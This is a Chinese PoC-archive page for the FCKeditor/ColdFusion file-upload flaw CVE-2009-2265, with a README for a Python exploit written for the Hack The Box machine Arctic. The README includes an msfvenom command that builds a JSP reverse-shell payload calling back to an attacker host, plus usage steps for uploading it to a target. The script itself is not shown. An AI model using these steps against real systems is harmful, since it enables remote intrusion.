关联漏洞
标题:
FCKeditor 路径遍历漏洞
(CVE-2009-2265)
描述:FCKeditor是个人开发者的一款开源的专用于在网页上编辑HTML的编辑器。 FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在路径遍历漏洞: 147.function FileUpload( $resourceType, $currentFolder ) 148.{ 149.$sErrorNumber = '0' ; 150.$sFileName = '' ; 151. 152.if ( isse
描述
coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/
介绍
# zaphoxx-coldfusion
coldfusion exploit based on https://cvedetails.com/cve/CVE-2009-2265/
The main reason I setup a python script for this particular cve was that the metasploit version of the same did not work for me when I tried to solve the HTB machine Arctic. Also it was nice to get some little python pratice. However there is another python version of that same exploit around which was originally created by Alexander Reid if you prefer to use his version.
Usage is pretty simple:
Make sure you have a payload file created
e.g. using msfvenom:
`msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp`
usage: `python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]`
`usage: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]`
optional arguments:
`-h, --help show this help message and exit`
`-t TARGET target ip`
`-p PORT target port`
`-f FILEPATH path of file with shellcode to upload`
`-b BASEPATH coldfusion basepath`
文件快照
[4.0K] /data/pocs/bc065872d9e033b85848235e85d68aff0283776c
├── [3.0K] 2265.py
└── [1.0K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。